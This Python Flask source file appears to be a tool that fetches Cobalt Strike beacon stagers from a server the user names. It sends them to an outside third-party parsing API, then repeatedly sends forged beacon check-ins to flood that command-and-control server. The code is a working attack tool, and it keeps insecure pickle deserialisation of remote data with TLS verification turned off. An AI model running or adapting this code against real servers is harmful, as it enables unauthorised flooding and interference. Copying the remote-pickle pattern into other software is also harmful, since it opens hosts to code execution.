1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172
| import os from flask import Flask, jsonify, render_template, request, url_for, send_from_directory from werkzeug.utils import secure_filename import argparse import base64 import hashlib import json import os import pickle import re import ssl import subprocess import tempfile import zipfile from urllib.parse import urlencode from urllib.parse import urljoin
import urllib3
# Flask application object; the route handlers in this file register on it.
app = Flask(__name__)

# Shared urllib3 connection pool. Certificate verification is switched off
# (cert_reqs=ssl.CERT_NONE), so TLS peers are NOT authenticated.
http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)

# Request headers carrying a fixed Firefox-on-Windows User-Agent string.
EMPTY_UA_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
}

# Architecture name -> relative path joined onto the target URL.
URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}

# True when the SERVERLESS environment variable is set to a non-empty value.
IS_SERVERLESS = bool(os.environ.get('SERVERLESS'))
print(IS_SERVERLESS)

# Silence urllib3 warnings for the whole process (with verification disabled
# above, every HTTPS request would otherwise emit one).
urllib3.disable_warnings()
def get_beacon_data(url, arch) -> bytes:
    """Download the payload served under the architecture-specific path.

    Args:
        url: Base URL of the target server. It should include a scheme;
            ``urljoin`` cannot build an absolute URL from a scheme-less base.
        arch: Key into ``URL_PATHS`` (``'x86'`` or ``'x64'``).

    Returns:
        The raw response body.

    Raises:
        KeyError: If ``arch`` is not a key of ``URL_PATHS``.
        Exception: If the server answers with a status other than 200.
    """
    # Use the module-level pool, headers and path table instead of building
    # identical copies (and a fresh, never-closed connection pool) per call.
    full_url = urljoin(url, URL_PATHS[arch])
    r = http.request('GET', full_url, headers=EMPTY_UA_HEADERS, timeout=30)
    if r.status != 200:
        raise Exception("读取beacon失败..")
    return r.data
def _parse_beacon_data(buf: bytes):
    """Send raw beacon bytes to the remote parsing API and return its answer.

    The bytes are base64-encoded and POSTed as the ``buf`` form field. The
    JSON reply is expected to carry ``status`` and, on success, a
    base64-encoded pickle under ``conf``.

    Args:
        buf: Raw beacon payload, as returned by ``get_beacon_data``.

    Returns:
        The object obtained by unpickling the decoded ``conf`` field.

    Raises:
        Exception: If the API answers with a non-200 status, or with
            ``status == "error"`` (the message is the API's ``msg`` field).
    """
    # The URL is written without the surrounding "<...>" the literal used to
    # carry; with the brackets it is not a valid URL and the request fails.
    api = "https://i.hacking8.com/cobaltspam"
    payload = {"buf": base64.b64encode(buf).decode()}

    resp = http.request("POST", api, fields=payload)
    if resp.status != 200:
        raise Exception("解析beacon数据失败")

    reply = json.loads(resp.data.decode())
    if reply["status"] == "error":
        raise Exception(reply["msg"])

    # SECURITY: pickle.loads on data received over the network lets the remote
    # service (or anyone able to tamper with the unverified TLS connection)
    # execute arbitrary code in this process. Kept because the wire format is
    # defined by the remote API; replace with a safe format if that changes.
    return pickle.loads(base64.b64decode(reply["conf"]))
def _register_beacon(a, b):
    """Ask the remote API to build check-in requests for a beacon.

    Args:
        a: Bytes-like public key; sent base64-encoded as the ``pubkey`` field.
        b: JSON-serialisable metadata description; sent as the ``meta`` field.

    Returns:
        The object obtained by unpickling the base64-decoded ``conf`` field
        of the reply. The caller in this file iterates it as
        ``(body, headers, params)`` triples.

    Raises:
        Exception: If the API answers with a non-200 status or reports
            ``status == "error"``.
    """
    # The URL is written without the surrounding "<...>" the literal used to
    # carry; with the brackets it is not a valid URL and the request fails.
    api = "https://i.hacking8.com/cobaltspam"
    payload = {
        "pubkey": base64.b64encode(a).decode(),
        "meta": json.dumps(b),
    }

    resp = http.request("POST", api, fields=payload)
    if resp.status != 200:
        raise Exception("生成数据失败")

    reply = json.loads(resp.data.decode())
    # Same error envelope that _parse_beacon_data checks for this endpoint;
    # without it an error reply surfaced as a bare KeyError on "conf".
    if reply.get("status") == "error":
        raise Exception(reply.get("msg", "生成数据失败"))

    # SECURITY: pickle.loads on data received over the network allows the
    # remote side to execute arbitrary code in this process. Kept because the
    # wire format is defined by the remote API.
    return pickle.loads(base64.b64decode(reply["conf"]))
def C2Server(url, option):
    """Fetch and print a server's beacon configuration, then send check-ins.

    Args:
        url: Base URL handed to ``get_beacon_data``.
        option: ``1`` means "print the configuration only". Any other value
            is the batch limit: the function returns once the 1-based
            request counter reaches it. Values of 999 or more never satisfy
            the limit, so the loop does not terminate on its own.

    Returns:
        ``None`` when ``option == 1`` or when the beacon type is neither
        HTTP nor HTTPS; otherwise ``{"info": [...]}`` holding one message
        per request that was answered with status 200.

    Raises:
        Exception: If neither the x86 nor the x64 payload yields a
            configuration, plus anything raised by the helper functions.
    """
    res_info = []
    only_print = option == 1
    batch_size = option

    ret = _parse_beacon_data(get_beacon_data(url, 'x86'))
    if not ret:
        # Fall back to the 64-bit payload when the 32-bit one parsed empty.
        ret = _parse_beacon_data(get_beacon_data(url, 'x64'))
    if not ret:
        raise Exception("解析beacon数据失败")
    conf = ret["conf"]

    print("获取Beacon信息成功!")
    for k, v in conf.items():
        print(k, ":", v)
    if only_print:
        return None

    if conf['BeaconType'][0] not in ('HTTP', 'HTTPS'):
        print("BeaconType " + str(conf['BeaconType']) + " not yet supported! Quitting.")
        return None

    # Everything derived purely from `conf` is loop-invariant: compute once.
    host_override = None
    if 'HostHeader' in conf:
        domain = re.search('Host: (.*)$', conf['HostHeader'], re.I)
        if domain:
            host_override = domain.group(1).strip()
    # 'C2Server' is read as "<host>,<path>[,...]"; only the first pair is used.
    c2_parts = conf['C2Server'].split(',')
    target = urljoin(
        conf['BeaconType'][0] + '://' + c2_parts[0] + ':' + str(conf['Port']),
        c2_parts[1])

    index = 1
    while 1:
        r = _register_beacon(conf["PublicKey"], conf["HttpGet_Metadata"])
        for body, headers, params in r:
            if host_override is not None:
                headers['Host'] = host_override
            _u = target
            if params:
                _u += "?" + urlencode(params)
            req = http.request("GET", _u, body=body, headers=headers, timeout=30)
            if req.status == 200:
                message = '上线成功! index:{}'.format(index)
                res_info.append(message)
                print(message)
            else:
                print("上线失败! index:{}".format(index))
            index += 1
            # NOTE(review): the limit is checked after every request, so
            # exactly `batch_size - 1` requests are sent. The source layout
            # had lost its indentation; confirm this placement is intended.
            if index >= batch_size and batch_size < 999:
                return {"info": res_info}
@app.route("/", methods=["POST", "GET"])
def chong():
    """HTTP entry point: liveness reply on GET, run ``C2Server`` on POST.

    A POST body must be a JSON object with the keys ``ipaddress``, ``port``
    and ``option``. ``ipaddress`` and ``port`` are joined as
    ``"<ipaddress>:<port>"``; ``option`` is converted to ``int`` and
    incremented by one before being handed to ``C2Server``.
    NOTE(review): ``ipaddress`` presumably has to include the URL scheme,
    because the value ends up as the base of a ``urljoin`` — confirm with
    the client.

    Returns:
        ``"helloword"`` for non-POST requests, a JSON 400 response when the
        body is malformed, otherwise the JSON-encoded result of ``C2Server``.
    """
    # Flask also dispatches the automatic HEAD method to this view; answer it
    # like GET instead of falling through to a separate junk body.
    if request.method != "POST":
        return "helloword"

    try:
        data = json.loads(request.data)
        target = "{}:{}".format(str(data['ipaddress']), str(data['port']))
        batch = int(data['option']) + 1
    except (ValueError, TypeError, KeyError) as err:
        # Malformed JSON, a non-object body, a missing key or a non-numeric
        # option is a client error, not a server crash.
        return jsonify({"error": "invalid request body: {}".format(err)}), 400

    return jsonify(C2Server(target, batch))
if __name__ == "__main__":
    # Start the development server only when executed as a script, so that
    # importing this module (WSGI server, tests) does not block.
    # SECURITY: the server listens on every interface (0.0.0.0). The Werkzeug
    # debugger allows arbitrary code execution from the browser, so it is
    # opt-in through the FLASK_DEBUG environment variable instead of always on.
    app.run(
        debug=os.environ.get("FLASK_DEBUG", "").lower() in ("1", "true"),
        port=9000,
        host='0.0.0.0',
    )
|